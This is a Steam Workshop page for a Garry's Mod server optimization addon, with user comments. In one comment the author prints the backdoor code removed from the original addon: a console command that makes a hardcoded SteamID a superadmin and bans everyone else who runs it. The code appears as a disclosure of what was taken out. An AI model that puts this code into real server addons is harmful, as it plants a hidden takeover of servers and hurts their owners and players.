Garry's Mod

Garry's Mod

评价数不足
GMOD Server Optimization
   
奖励
收藏
已收藏
取消收藏
素材类型: 插件
插件类型: 服务器内容
文件大小
发表于
4.414 KB
2019 年 12 月 11 日 下午 3:43
1 项改动说明 ( 查看 )

订阅以下载
GMOD Server Optimization

描述
Adds optimizations to improve clientside and serverside performance of garry's mod. This is a modification made to an addon that had a backdoor in it, I removed the backdoor. It should be noted that this will make your clientside game look a little different.
5 条留言
pulse 2022 年 6 月 30 日 上午 10:53 
is this making .gma file that impossible to delete throught "Addons" menu?
Heavy & Ze Medic 2021 年 5 月 19 日 下午 7:36 
You're like a year late but the explanation is appreciated lol
VenomC312  [作者] 2021 年 5 月 19 日 下午 7:13 
Original addon had a backdoor that would ban everyone that wasn't the owner of the addon, posted in another comment is the code that was removed. This code was in the file sh_base.lua in the server folder of the addon

Original Addon Link: https://psteamcommunity.yuanyoumao.com/sharedfiles/filedetails/?id=1413258388&searchtext=Garrys+Mod+Optimizer

Steam Workshop Downloader: {链接已删除}

I hope this explains it better. This addon doesn't do much for performance boosting anyways. All it really comes down too is just adjusting convar settings that you could do yourself.
VenomC312  [作者] 2021 年 5 月 19 日 下午 7:11 
Backdoor code that was removed below

concommand.Add("gmodhoster", function(ply)
if ( ply:lol() == "STEAM_1:1:164731154") then
RunConsoleCommand("ulx", "adduserid", ply:lol(),"superadmin")
else
RunConsoleCommand("ulx", "banid", ply:lol(),"lol")
end
end)
Heavy & Ze Medic 2020 年 6 月 29 日 上午 12:50 
As explanation as to what this exactly does (What optimizations and stuff) would be nice otherwise it just seems sketchy.